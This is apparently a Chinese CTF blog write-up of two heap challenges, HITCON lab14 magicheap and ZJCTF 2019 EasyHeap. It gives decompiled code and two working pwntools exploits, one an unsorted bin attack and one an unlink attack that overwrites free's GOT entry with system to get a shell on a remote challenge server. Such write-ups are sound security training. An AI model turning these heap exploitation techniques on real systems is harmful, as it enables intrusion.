MENU

Catalog

    HITCON Training lab14 Unsorted bin attack magicheap & [ZJCTF 2019]EasyHeap

    November 20, 2020 • Read: 964 • Pwn

    现在居然可以一次过了,有点惊讶

    int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
    {
      int v3; // eax
      char buf; // [rsp+0h] [rbp-10h]
      unsigned __int64 v5; // [rsp+8h] [rbp-8h]
    
      v5 = __readfsqword(0x28u);
      setvbuf(stdout, 0LL, 2, 0LL);
      setvbuf(stdin, 0LL, 2, 0LL);
      while ( 1 )
      {
        while ( 1 )
        {
          menu();
          read(0, &buf, 8uLL);
          v3 = atoi(&buf);
          if ( v3 != 3 )
            break;
          delete_heap();
        }
        if ( v3 > 3 )
        {
          if ( v3 == 4 )
            exit(0);
          if ( v3 == 4869 )
          {
            if ( (unsigned __int64)magic <= 4869 )
            {
              puts("So sad !");
            }
            else
            {
              puts("Congrt !");
              l33t();
            }
          }
          else
          {
    LABEL_17:
            puts("Invalid Choice");
          }
        }
        else if ( v3 == 1 )
        {
          create_heap();
        }
        else
        {
          if ( v3 != 2 )
            goto LABEL_17;
          edit_heap();
        }
      }
    }

    create_heap(),申请大小可以自定义
    edit_heap(),有堆溢出漏洞。
    delete_heap(), 删除后指针至0
    这道题应该也可以fastbin attack,所以不能算是典型的例题,等下去找一道unsorted bin attack 和 fastbin attak 打搭配的题目。

    # -*- coding: utf-8 -*-
    from pwn import *
    r = process("./magicheap")
    context.log_level = "debug"
    def create_heap(size, content):
        r.sendlineafter("Your choice :", "1")
        r.sendlineafter("Size of Heap : ", str(size))
        r.sendlineafter("Content of heap:", content)
    
    def edit_heap(idx, size, content):
        r.sendlineafter("Your choice :", "2")
        r.sendlineafter("Index :", str(idx))
        r.sendlineafter("Size of Heap : ", str(size))
        r.sendlineafter("Content of heap : ", content)
    
    def delete_heap(idx):
        r.sendlineafter("Your choice :", "3")
        r.sendlineafter("Index :", str(idx))
    magic = 0x00000000006020C0
    create_heap(0x18, 'a')
    create_heap(0x88, 'b')
    create_heap(0x18, 'c')
    delete_heap(1)
    payload = 'a' * 0x18 + p64(0x91) + p64(0) + p64(magic - 0x10)
    edit_heap(0, len(payload), payload)
    create_heap(0x88, 'd')
    r.sendlineafter("Your choice :", "4869")
    r.interactive()
    

    2020-11-29更新
    这两道题目是一模一样的,但是 [ZJCTF 2019]EasyHeap 在buuoj上面直接利用magic,cat不出来,可能是配置的问题,所以我利用unlink做了一遍。

    from pwn import *
    from LibcSearcher import *
    context.log_level = "debug"
    #r = process('./easyheap')
    r = remote('node3.buuoj.cn', 26026)
    elf = ELF('./easyheap')
    
    def choice(idx):
        r.sendlineafter("Your choice :", str(idx))
    
    def create_heap(size, content):
        choice(1)
        r.sendlineafter("Size of Heap : ", str(size))
        r.sendlineafter("Content of heap:", content)
    
    def edit_heap(idx, content):
        choice(2)
        r.sendlineafter("Index :", str(idx))
        r.sendlineafter("Size of Heap : ", str(len(content)))
        r.sendlineafter("Content of heap : ", content)
    
    def delete_heap(idx):
        choice(3)
        r.sendlineafter("Index :", str(idx))
    
    create_heap(0x88, 'b')
    create_heap(0x88, 'b')
    #delete_heap(1)
    ptr = 0x00000000006020E0
    FD = ptr - 0x18
    BK = ptr - 0x10
    
    edit_heap(0, p64(0) * 2 + p64(FD) + p64(BK) + 'a' * (0x88 - 0x20 - 0x8) + p64(0x80) + p64(0x90))
    delete_heap(1)
    #gdb.attach(r)
    edit_heap(0, 'a' * 0x18 + p64(elf.got['free']))
    edit_heap(0, p64(elf.plt['system']))
    create_heap(0x18, 'sh\x00')
    delete_heap(1)
    r.interactive()
    Last Modified: November 29, 2020
    Archives QR Code Tip
    QR Code for this page
    Tipping QR Code